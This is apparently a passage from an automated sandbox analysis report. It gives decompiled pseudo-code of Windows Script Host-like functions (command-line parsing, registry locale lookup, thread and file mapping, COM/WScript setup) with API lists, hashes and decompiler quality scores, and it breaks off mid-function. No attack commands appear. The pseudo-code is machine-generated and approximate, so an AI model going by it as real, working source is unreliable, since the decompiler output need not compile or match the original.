				void* _t55;

				_t15 =  *0xb97004; // 0xbb40e64e
				_v8 = _t15 ^ _t50;
				_push(_t44);
				_push(_t41);
				_push(0x7d0);
				_push(GetModuleHandleA(0));
				if(E00B82E3A(0, _t41, _t44, _t52) == 0) {
					_push(1);
				} else {
					_t54 =  *0xb97001; // 0x0
					if(_t54 == 0) {
						_t19 = GetCommandLineA();
						_v16 = _t19;
						_t42 = MultiByteToWideChar(0, 0, _t19, 0xffffffff, 0, 0);
						E00B8320B(_t42 + _t42);
						_v12 = _t51;
						MultiByteToWideChar(0, 0, _v16, 0xffffffff, _v12, _t42);
						_t43 = _v12;
					} else {
						_t30 = GetCommandLineW();
						_v12 = _t30;
						_t49 = lstrlenW(_t30) + 1;
						_t55 = lstrlenW(_t30) + 1;
						E00B8320B(_t49 + _t49);
						_t43 = _t51;
						E00B831BD(_t51, _t49, _v12);
						_t51 = _t51 + 0xc;
					}
					E00B8320B(4 + E00B83495(_t37, _t43, 0) * 4);
					_t46 = _t51;
					 *((intOrPtr*)(_t46 + E00B83495(_t37, _t43, _t46) * 4)) = 0;
					_t28 = E00B82171(0, _t40, _t55, _t27, _t46);
					E00B85C07();
					_push(_t28);
				}
				ExitProcess();
			}





















                                                        0x00b820d7
                                                        0x00b820de
                                                        0x00b820e2
                                                        0x00b820e3
                                                        0x00b820e4
                                                        0x00b820f2
                                                        0x00b820fa
                                                        0x00b877bd
                                                        0x00b82100
                                                        0x00b82100
                                                        0x00b82106
                                                        0x00b877c4
                                                        0x00b877d7
                                                        0x00b877dc
                                                        0x00b877e1
                                                        0x00b877e6
                                                        0x00b877f4
                                                        0x00b877f6
                                                        0x00b8210c
                                                        0x00b8210c
                                                        0x00b82113
                                                        0x00b8211e
                                                        0x00b8211e
                                                        0x00b82122
                                                        0x00b82127
                                                        0x00b8212e
                                                        0x00b82133
                                                        0x00b82133
                                                        0x00b82144
                                                        0x00b82149
                                                        0x00b82154
                                                        0x00b82157
                                                        0x00b82160
                                                        0x00b82165
                                                        0x00b82165
                                                        0x00b82166

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(00000000,000007D0), ref: 00B820EC
                                                          • Part of subcall function 00B82E3A: InitializeCriticalSection.KERNEL32(00B97034,00B82F08,000000A0,00B820F8,00000000), ref: 00B82E64
                                                          • Part of subcall function 00B82E3A: GetVersionExA.KERNEL32(00000094), ref: 00B82E82
                                                        • GetCommandLineW.KERNEL32(00000000), ref: 00B8210C
                                                        • lstrlenW.KERNEL32(00000000), ref: 00B82116
                                                          • Part of subcall function 00B82171: CoInitialize.OLE32(00000000), ref: 00B821A5
                                                          • Part of subcall function 00B82171: CoUninitialize.OLE32 ref: 00B821EB
                                                          • Part of subcall function 00B85C07: DeleteCriticalSection.KERNEL32(00B97034,00B82165,?,?,?,00000000), ref: 00B934D0
                                                        • ExitProcess.KERNEL32 ref: 00B82166
                                                        • GetCommandLineA.KERNEL32(00000000), ref: 00B877C4
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00B877DA
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00B877F4
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharCommandCriticalInitializeLineMultiSectionWide$DeleteExitHandleModuleProcessUninitializeVersionlstrlen
                                                        • String ID:
                                                        • API String ID: 1125670335-0
                                                        • Opcode ID: 7404e20b0dd48f8765e25acbfc5b4661de674296701950f053b93f6f263fbde6
                                                        • Instruction ID: 812dd7fa11bfb3b48c103a54df645557bb920ef3dd53452c1111f26df13b8ea4
                                                        • Opcode Fuzzy Hash: 7404e20b0dd48f8765e25acbfc5b4661de674296701950f053b93f6f263fbde6
                                                        • Instruction Fuzzy Hash: 38219FB1805208BBD710BFA49C8EDAF7EFCEB46B60B240595F601A3170DE359D01CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B9422B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 72%
                                                        			E00B9422B() {
				signed int _v8;
				char _v16;
				void* _v20;
				int _v24;
				void* __edi;
				void* __esi;
				signed int _t14;
				intOrPtr _t17;
				long _t23;
				char* _t25;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;
				signed int _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t14 =  *0xb97004; // 0xbb40e64e
				_v8 = _t14 ^ _t35;
				_t37 = 0 -  *0xb974cc; // 0x0
				if(_t37 == 0) {
					_push(_t33);
					_t34 = 0;
					_v24 = 6;
					if(RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Active Setup\\Installed Components\\{89820200-ECBD-11CF-8B85-00AA005B4383}", 0, 1,  &_v20) == 0) {
						_t23 = RegQueryValueExW(_v20, L"Locale", 0, 0,  &_v16,  &_v24);
						RegCloseKey(_v20);
						_t31 = _t31;
						if(_t23 == 0) {
							while(1) {
								_push(3);
								_push( *((intOrPtr*)(0xb942d8 + _t34 * 8)));
								_t25 =  &_v16;
								_push(_t25);
								L00B9528A();
								_t36 = _t36 + 0xc;
								if(_t25 == 0) {
									break;
								}
								_t34 = _t34 + 1;
								if(_t34 < 0x1c) {
									continue;
								}
								goto L7;
							}
							 *0xb974cc =  *((intOrPtr*)(0xb942dc + _t34 * 8));
						}
					}
					L7:
					_pop(_t33);
				}
				_t17 =  *0xb974cc; // 0x0
				return E00B81335(_t17, _t27, _v8 ^ _t35, _t30, _t31, _t33);
			}





















                                                        0x00b94233
                                                        0x00b9423a
                                                        0x00b9423f
                                                        0x00b94246
                                                        0x00b94248
                                                        0x00b9424f
                                                        0x00b9425c
                                                        0x00b9426b
                                                        0x00b94280
                                                        0x00b9428b
                                                        0x00b94293
                                                        0x00b94294
                                                        0x00b94296
                                                        0x00b94296
                                                        0x00b94298
                                                        0x00b9429f
                                                        0x00b942a2
                                                        0x00b942a3
                                                        0x00b942a8
                                                        0x00b942ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00b942af
                                                        0x00b942b3
                                                        0x00000000
                                                        0x00b942b5
                                                        0x00000000
                                                        0x00b942b3
                                                        0x00b942bf
                                                        0x00b942bf
                                                        0x00b94294
                                                        0x00b942c5
                                                        0x00b942c5
                                                        0x00b942c5
                                                        0x00b942c9
                                                        0x00b942d7

                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00B94263
                                                        • RegQueryValueExW.ADVAPI32(?,Locale,00000000,00000000,00B94C78,00000006), ref: 00B94280
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B9428B
                                                        • _wcsnicmp.MSVCRT ref: 00B942A3
                                                        Strings
                                                        • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 00B94252
                                                        • Locale, xrefs: 00B94278
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue_wcsnicmp
                                                        • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                                        • API String ID: 2262609651-1161606707
                                                        • Opcode ID: 3c6eb32f08459a1f4b8dce6e38aa006e6bd8a470498448996950e739e6fc1bb8
                                                        • Instruction ID: 8d9d4bef60bbae9f366424ae62bcc22187bd46b91b67816d203b391828019f40
                                                        • Opcode Fuzzy Hash: 3c6eb32f08459a1f4b8dce6e38aa006e6bd8a470498448996950e739e6fc1bb8
                                                        • Instruction Fuzzy Hash: 04118C35951119AACF10ABA49D08EEF7BECFB08760F0004A5F902A3261EB30CA46CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B842B5, Relevance: 9.1, APIs: 6, Instructions: 130registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E00B842B5(void* _a4, short* _a8, short* _a12, int _a16) {
				signed int _v8;
				int _v12;
				int _v16;
				int* _v20;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				long _t48;
				int _t51;
				int _t52;
				int _t55;
				signed int _t57;
				signed int _t68;
				int _t70;
				char* _t71;
				signed int _t73;
				int _t74;
				intOrPtr _t76;

				_t42 =  *0xb97004; // 0xbb40e64e
				_v8 = _t42 ^ _t73;
				_t76 =  *0xb97001; // 0x0
				if(_t76 == 0) {
					__eflags = _a8;
					if(_a8 == 0) {
						_v20 = 0;
						L18:
						_t71 = _a16 + 1;
						E00B8320B(_t71);
						_t70 = _t74;
						_v12 = _t71;
						_t48 = RegQueryValueExA(_a4, _v20, 0,  &_v16, _t70,  &_v12);
						__eflags = _t48;
						if(__eflags != 0) {
							L8:
							if(__eflags > 0) {
								_t48 = _t48 & 0x0000ffff | 0x80070000;
							}
							L6:
							return E00B81335(_t48, 0, _v8 ^ _t73, _t69, _t70, _t71);
						}
						__eflags = _v16 - 1;
						if(_v16 == 1) {
							L21:
							_t51 = _v12;
							__eflags =  *(_t70 + _t51 - 1);
							if( *(_t70 + _t51 - 1) != 0) {
								L7:
								_t48 = 0x80040153;
								goto L6;
							}
							_t52 = MultiByteToWideChar(0, 0, _t70, 0xffffffff, _a12, _a16);
							__eflags = _t52;
							if(_t52 != 0) {
								L5:
								_t48 = 0;
								goto L6;
							}
							L14:
							_t48 = GetLastError();
							__eflags = _t48;
							goto L8;
						}
						__eflags = _v16 - 2;
						if(_v16 != 2) {
							goto L7;
						}
						goto L21;
					}
					_t71 = WideCharToMultiByte;
					_t70 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
					__eflags = _t70;
					if(_t70 != 0) {
						E00B8320B(_t53);
						_v20 = _t74;
						_t55 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, _v20, _t70, 0, 0);
						__eflags = _t55;
						if(_t55 == 0) {
							goto L14;
						}
						goto L18;
					}
					goto L14;
				}
				_push( &_v20);
				_t57 = _a16;
				_t68 = 2;
				_t69 = _t57 * _t68 >> 0x20;
				_push(_t57 * _t68 >> 0x20);
				_push(_t57 * _t68);
				if(E00B8434F() < 0) {
					goto L7;
				}
				_t71 = _a12;
				_v12 = _v20;
				_t48 = RegQueryValueExW(_a4, _a8, 0,  &_v16, _t71,  &_v12);
				if(_t48 != 0) {
					goto L8;
				}
				if(_v16 != 1) {
					__eflags = _v16 - 2;
					if(_v16 == 2) {
						goto L4;
					}
					goto L7;
				}
				L4:
				if(_t71[(_v12 >> 1) * 2 - 2] != 0) {
					goto L7;
				}
				goto L5;
			}























                                                        0x00b842bd
                                                        0x00b842c4
                                                        0x00b842cc
                                                        0x00b842d2
                                                        0x00b89714
                                                        0x00b89717
                                                        0x00b89759
                                                        0x00b8975c
                                                        0x00b8975f
                                                        0x00b89762
                                                        0x00b89767
                                                        0x00b89776
                                                        0x00b8977c
                                                        0x00b89782
                                                        0x00b89784
                                                        0x00b896f3
                                                        0x00b896f3
                                                        0x00b896fe
                                                        0x00b896fe
                                                        0x00b84336
                                                        0x00b84347
                                                        0x00b84347
                                                        0x00b8978a
                                                        0x00b8978e
                                                        0x00b8979a
                                                        0x00b8979a
                                                        0x00b8979d
                                                        0x00b897a1
                                                        0x00b896e9
                                                        0x00b896e9
                                                        0x00000000
                                                        0x00b896e9
                                                        0x00b897b2
                                                        0x00b897b8
                                                        0x00b897ba
                                                        0x00b84334
                                                        0x00b84334
                                                        0x00000000
                                                        0x00b84334
                                                        0x00b89732
                                                        0x00b89732
                                                        0x00b89738
                                                        0x00000000
                                                        0x00b89738
                                                        0x00b89790
                                                        0x00b89794
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89794
                                                        0x00b89719
                                                        0x00b8972c
                                                        0x00b8972e
                                                        0x00b89730
                                                        0x00b8973c
                                                        0x00b89741
                                                        0x00b89751
                                                        0x00b89753
                                                        0x00b89755
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89757
                                                        0x00000000
                                                        0x00b89730
                                                        0x00b842db
                                                        0x00b842dc
                                                        0x00b842e1
                                                        0x00b842e2
                                                        0x00b842e4
                                                        0x00b842e5
                                                        0x00b842ed
                                                        0x00000000
                                                        0x00000000
                                                        0x00b842f6
                                                        0x00b842f9
                                                        0x00b8430c
                                                        0x00b84314
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8431e
                                                        0x00b89708
                                                        0x00b8970c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b89712
                                                        0x00b84324
                                                        0x00b8432e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(74BA46CE,?,00000000,?,00020019,74BA46CE), ref: 00B8430C
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00020019,80000000,?,00020019,?,74BA46CE), ref: 00B8972A
                                                        • GetLastError.KERNEL32(?,000000FF,00020019,?,?,74BA46CE,00020019,80000000,?,00020019), ref: 00B89732
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00B89751
                                                        • RegQueryValueExA.ADVAPI32 ref: 00B8977C
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00020019,?,?,74BA46CE,00020019,80000000,?,00020019), ref: 00B897B2
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$QueryValue$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2978555403-0
                                                        • Opcode ID: c48791122e695c0964ed25684894301aecc51c454733ea8d61050753b30173be
                                                        • Instruction ID: e2c1d18d7a93cd2bfced38d1a5fbcb24bfd1b9c87360eeb17da32e734acb2748
                                                        • Opcode Fuzzy Hash: c48791122e695c0964ed25684894301aecc51c454733ea8d61050753b30173be
                                                        • Instruction Fuzzy Hash: 83416AB690010AFF9F20AF949C85CBF7BFCEB45354B1485AAF921A3160DB309E45DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82C23, Relevance: 9.1, APIs: 6, Instructions: 90stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E00B82C23(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t44;
				void* _t48;
				int _t50;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t65;
				signed int _t67;
				intOrPtr _t68;

				_t60 = __edx;
				_t33 =  *0xb97004; // 0xbb40e64e
				_v8 = _t33 ^ _t67;
				_t35 = _a4;
				_t56 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				if( *((intOrPtr*)(_a4 + 0x20)) == 0) {
					if(E00B83A91(__edx,  &_v20, _a12) != 0) {
						_v24 =  &_a16;
						_t44 = E00B82CB9(__edx, _v20,  &_v12,  &_v24);
						_v24 = 0;
						if(_t44 >= 0) {
							if(_a8 != 0) {
								if(E00B83A91(__edx,  &_v16, _a8) == 0) {
									goto L4;
								} else {
									_t64 = __imp__#7;
									_t48 =  *_t64(_v12);
									_t65 = _t48 +  *_t64();
									_t61 = E00B877AC;
									_t50 = lstrlenW(E00B877AC);
									_t29 = _t65 + 1; // 0x1
									_t66 = _t50 + _t29;
									E00B8320B(_t50 + _t29 + _t50 + _t29, _v16);
									_t56 = _t68;
									E00B831BD(_t68, _t66, _v16);
									E00B836CD(_t68, _t66, E00B877AC);
									E00B836CD(_t56, _t66, _v12);
									goto L5;
								}
								goto L7;
							} else {
								L4:
								_t56 = _v12;
							}
							L5:
							E00B819DE(_a4, _t56);
						}
					}
					_t63 = __imp__#6;
					 *_t63(_v20);
					 *_t63(_v16);
					_t35 =  *_t63(_v12);
				}
				L7:
				return E00B81335(_t35, _t56, _v8 ^ _t67, _t60, _t61, _t63);
			}





















                                                        0x00b82c23
                                                        0x00b82c2b
                                                        0x00b82c32
                                                        0x00b82c35
                                                        0x00b82c39
                                                        0x00b82c3d
                                                        0x00b82c40
                                                        0x00b82c43
                                                        0x00b82c49
                                                        0x00b82c59
                                                        0x00b82c5e
                                                        0x00b82c6c
                                                        0x00b82c73
                                                        0x00b82c76
                                                        0x00b82c7b
                                                        0x00b87752
                                                        0x00000000
                                                        0x00b87758
                                                        0x00b8775b
                                                        0x00b87761
                                                        0x00b8776a
                                                        0x00b8776d
                                                        0x00b87773
                                                        0x00b87779
                                                        0x00b87779
                                                        0x00b87780
                                                        0x00b87785
                                                        0x00b8778c
                                                        0x00b87794
                                                        0x00b8779e
                                                        0x00000000
                                                        0x00b877a3
                                                        0x00000000
                                                        0x00b82c81
                                                        0x00b82c81
                                                        0x00b82c81
                                                        0x00b82c81
                                                        0x00b82c84
                                                        0x00b82c88
                                                        0x00b82c88
                                                        0x00b82c76
                                                        0x00b82c90
                                                        0x00b82c96
                                                        0x00b82c9b
                                                        0x00b82ca0
                                                        0x00b82ca0
                                                        0x00b82ca2
                                                        0x00b82cb3

                                                        APIs
                                                          • Part of subcall function 00B83A91: LoadStringW.USER32(?,?,00000800,?), ref: 00B83ADB
                                                          • Part of subcall function 00B83A91: SysAllocString.OLEAUT32(?), ref: 00B83AF2
                                                        • SysFreeString.OLEAUT32(?), ref: 00B82C96
                                                        • SysFreeString.OLEAUT32(?), ref: 00B82C9B
                                                        • SysFreeString.OLEAUT32(?), ref: 00B82CA0
                                                          • Part of subcall function 00B82CB9: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00B8F6DE,?,?,?), ref: 00B82CF7
                                                          • Part of subcall function 00B82CB9: SysAllocString.OLEAUT32(?), ref: 00B82D08
                                                          • Part of subcall function 00B82CB9: LocalFree.KERNEL32(?,?,?,?,00B8F6DE,?,?,?), ref: 00B82D32
                                                        • SysStringLen.OLEAUT32(?), ref: 00B87761
                                                        • SysStringLen.OLEAUT32(?), ref: 00B87768
                                                        • lstrlenW.KERNEL32(00B877AC), ref: 00B87773
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: String$Free$Alloc$FormatLoadLocalMessagelstrlen
                                                        • String ID:
                                                        • API String ID: 2525758188-0
                                                        • Opcode ID: d3c4bf9a6a337270e9c709aa8c2cd374df6819a69e88f80f70ea54b7befc0102
                                                        • Instruction ID: 44ad9cb45347c4ed7687264752e50c026df0ca34c2b538b5e57c0c0a1db5faa1
                                                        • Opcode Fuzzy Hash: d3c4bf9a6a337270e9c709aa8c2cd374df6819a69e88f80f70ea54b7befc0102
                                                        • Instruction Fuzzy Hash: 4431F675D0021ABBCF11AFA5CC848EEBFF9EF48754B1044A6E915A3221DB319A15DFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8453E, Relevance: 9.1, APIs: 6, Instructions: 82threadCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00B8453E(void* __eax, intOrPtr _a4, void** _a8) {
				void* _t14;
				signed int _t15;
				void* _t19;
				signed int _t22;
				signed int _t30;
				void* _t31;

				_push(0x20);
				L00B82877();
				if(__eax == 0) {
					_t31 = 0;
				} else {
					_t31 = E00B845F5(__eax);
				}
				if(_t31 == 0) {
					_t30 = 0x8007000e;
					L9:
					return _t30;
				} else {
					 *((intOrPtr*)(_t31 + 8)) = _a4;
					_t14 = CreateEventA(0, 0, 0, 0);
					 *(_t31 + 0x1c) = _t14;
					if(_t14 == 0) {
						L12:
						_t15 = GetLastError();
						if(_t15 > 0) {
							_t15 = _t15 & 0x0000ffff | 0x80070000;
						}
						_t30 = _t15;
						L8:
						if(_t31 != 0) {
							E00B85F27(_t31, 1);
						}
						goto L9;
					}
					_t4 = _t31 + 0x14; // 0x14
					_t19 = CreateThread(0, 0, E00B82516, _t31, 0, _t4);
					 *(_t31 + 0x10) = _t19;
					if(_t19 == 0) {
						goto L12;
					}
					E00B824CF( *(_t31 + 0x1c), 0, 0xffffffff, 0xff);
					CloseHandle( *(_t31 + 0x1c));
					_t22 =  *(_t31 + 0xc);
					 *(_t31 + 0x1c) = 0;
					if(_t22 > 0) {
						_t22 = _t22 & 0x0000ffff | 0x80070000;
					}
					_t30 = _t22;
					if(_t30 >= 0) {
						 *_a8 = _t31;
						_t31 = 0;
						_t30 = 0;
					}
					goto L8;
				}
			}









                                                        0x00b84546
                                                        0x00b84548
                                                        0x00b84552
                                                        0x00b845e9
                                                        0x00b84558
                                                        0x00b8455f
                                                        0x00b8455f
                                                        0x00b84563
                                                        0x00b88559
                                                        0x00b845e0
                                                        0x00b845e6
                                                        0x00b84569
                                                        0x00b84570
                                                        0x00b84573
                                                        0x00b84579
                                                        0x00b8457e
                                                        0x00b88563
                                                        0x00b88563
                                                        0x00b8856b
                                                        0x00b88572
                                                        0x00b88572
                                                        0x00b88577
                                                        0x00b845d8
                                                        0x00b845da
                                                        0x00b88591
                                                        0x00b88591
                                                        0x00000000
                                                        0x00b845da
                                                        0x00b84584
                                                        0x00b84591
                                                        0x00b84597
                                                        0x00b8459c
                                                        0x00000000
                                                        0x00000000
                                                        0x00b845ad
                                                        0x00b845b5
                                                        0x00b845bb
                                                        0x00b845c0
                                                        0x00b845c3
                                                        0x00b88583
                                                        0x00b88583
                                                        0x00b845c9
                                                        0x00b845cd
                                                        0x00b845d2
                                                        0x00b845d4
                                                        0x00b845d6
                                                        0x00b845d6
                                                        0x00000000
                                                        0x00b845cd

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00B84548
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00B84527,?,?,?,?,?,?), ref: 00B84573
                                                        • CreateThread.KERNEL32(00000000,00000000,00B82516,00000000,00000000,00000014), ref: 00B84591
                                                        • CloseHandle.KERNEL32(?), ref: 00B845B5
                                                          • Part of subcall function 00B845F5: GetCurrentThreadId.KERNEL32(?,00B8455F,?,?,?,?,00B84527,?,?,?,?,?,?), ref: 00B8460B
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CreateThread$??2@CloseCurrentEventHandle
                                                        • String ID:
                                                        • API String ID: 2455320809-0
                                                        • Opcode ID: 5e7a31020d152ecacb311c6862d04e2570ecfbbf7581862434f472d34ddea28f
                                                        • Instruction ID: 95c1cbc7d376c8c3acf91b5b11d066b6fcf3095eb0685f4e4d76ed26b39995f9
                                                        • Opcode Fuzzy Hash: 5e7a31020d152ecacb311c6862d04e2570ecfbbf7581862434f472d34ddea28f
                                                        • Instruction Fuzzy Hash: A721AE72600216AFD7307F659CC4ABEBAE8EB507A4B644A79F616C7670CA34CC45C7A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B93FF0, Relevance: 9.1, APIs: 6, Instructions: 63fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B93FF0(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _t19;
				void* _t21;
				void* _t22;

				if(_a4 != 0) {
					if(_a8 == 0) {
						return LoadLibraryExW(_a4, 0, 0 | _a12 != 0x00000000);
					}
					_t22 = CreateFileW(_a4, 0x80000000, 5, 0, 3, 0, 0);
					if(_t22 == 0xffffffff) {
						goto L1;
					}
					_t21 = CreateFileMappingW(_t22, 0, 8, 0, 0, 0);
					CloseHandle(_t22);
					if(_t21 == 0) {
						goto L1;
					}
					_a4 = MapViewOfFile(_t21, 1, 0, 0, 0);
					CloseHandle(_t21);
					_t19 = _a4;
					if(_t19 == 0) {
						goto L1;
					}
					return _t19 | 0x00000001;
				}
				L1:
				return 0;
			}






                                                        0x00b93ffd
                                                        0x00b94006
                                                        0x00000000
                                                        0x00b9406b
                                                        0x00b9401d
                                                        0x00b94022
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94038
                                                        0x00b9403a
                                                        0x00b9403e
                                                        0x00000000
                                                        0x00000000
                                                        0x00b9404d
                                                        0x00b94050
                                                        0x00b94052
                                                        0x00b94057
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b94059
                                                        0x00b93fff
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNEL32(00000001,80000000,00000005,00000000,00000003,00000000,00000000), ref: 00B94017
                                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,00B94F4F,?,00000001,00000000), ref: 00B9402B
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B9403A
                                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00B94F4F,?,00000001,00000000), ref: 00B94046
                                                        • CloseHandle.KERNEL32(00000000), ref: 00B94050
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: File$CloseCreateHandle$MappingView
                                                        • String ID:
                                                        • API String ID: 1095920306-0
                                                        • Opcode ID: 2108aa4f4abe01810d64eed018d1f5f7617c2c996f5ff3f0cf271d7ec3736927
                                                        • Instruction ID: 7ed84e73fe8c5287dd448632bb0c3743bd327d59bbf0c1b640c605c6fad46221
                                                        • Opcode Fuzzy Hash: 2108aa4f4abe01810d64eed018d1f5f7617c2c996f5ff3f0cf271d7ec3736927
                                                        • Instruction Fuzzy Hash: 48018431502224BBCB311B269C4CEAB7EACEF46BF1F104461F908961A0CB718982DBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B851E5, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 166comCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 51%
                                                        			E00B851E5(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v8;
				char _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				intOrPtr* _t39;
				intOrPtr* _t40;
				intOrPtr* _t45;
				char* _t48;
				char* _t50;
				char* _t52;
				intOrPtr* _t53;
				intOrPtr _t54;
				intOrPtr* _t55;
				intOrPtr _t56;
				intOrPtr* _t57;
				intOrPtr _t58;
				intOrPtr* _t59;
				intOrPtr _t60;
				intOrPtr* _t61;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr _t66;
				char _t68;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr* _t93;
				signed int _t94;

				_t37 =  *0xb97004; // 0xbb40e64e
				_v8 = _t37 ^ _t94;
				_t39 = _a12;
				_t74 = _a4;
				_push(0x54);
				_v36 = _t39;
				_v32 = 0;
				_v28 = 0;
				L00B82877();
				_t95 = _t39;
				if(_t39 == 0) {
					_t93 = 0;
				} else {
					_t93 = E00B8541A(_t39, _t95, 0);
				}
				if(_t93 == 0) {
					_t92 = 0x8007000e;
				} else {
					_t7 = _t93 + 0x30; // 0x30
					_t48 = E00B818C4(_t7, 0x1000);
					_t92 = _t48;
					if(_t48 < 0) {
						L15:
						_t40 = _v28;
						if(_t40 != 0) {
							 *((intOrPtr*)( *_t40 + 8))(_t40);
						}
						if(_t93 != 0) {
							__eflags = _v32;
							if(_v32 != 0) {
								_t45 =  *((intOrPtr*)(_t93 + 0x24));
								 *((intOrPtr*)( *_t45 + 0x1c))(_t45);
							}
							 *((intOrPtr*)( *_t93 + 8))(_t93);
							goto L18;
						} else {
							L18:
							return E00B81335(_t92, _t74, _v8 ^ _t94, _t90, _t92, _t93);
						}
					}
					 *((intOrPtr*)(_t93 + 0x2c)) = _a8;
					_t50 =  &_v24;
					__imp__CLSIDFromString(_t74, _t50);
					_t92 = _t50;
					if(_t50 < 0) {
						goto L15;
					}
					_t52 =  &_v24;
					__imp__CoCreateInstance(_t52, 0, 0x17, 0xb815b8,  &_v28);
					_t92 = _t52;
					if(_t52 < 0) {
						goto L15;
					}
					_t53 = _v28;
					_t14 = _t93 + 0x24; // 0x24
					_t74 = _t14;
					_t54 =  *((intOrPtr*)( *_t53))(_t53, 0xb85374, _t74);
					_t92 = _t54;
					if(_t54 < 0) {
						goto L15;
					}
					_t55 = _v28;
					_t90 =  *_t55;
					_t16 = _t93 + 0x28; // 0x28
					_t56 =  *((intOrPtr*)( *_t55))(_t55, 0xb85384, _t16);
					_t92 = _t56;
					if(_t56 < 0) {
						goto L15;
					}
					_t57 =  *_t74;
					_t58 =  *((intOrPtr*)( *_t57 + 0xc))(_t57, _t93);
					_t92 = _t58;
					if(_t58 < 0) {
						goto L15;
					}
					_t59 =  *((intOrPtr*)(_t93 + 0x28));
					_v32 = 1;
					_t60 =  *((intOrPtr*)( *_t59 + 0xc))(_t59);
					_t92 = _t60;
					if(_t60 < 0) {
						goto L15;
					}
					_t61 =  *_t74;
					_t62 =  *((intOrPtr*)( *_t61 + 0x20))(_t61, L"WScript", 2);
					_t92 = _t62;
					if(_t62 < 0) {
						goto L15;
					}
					_t63 =  *_t74;
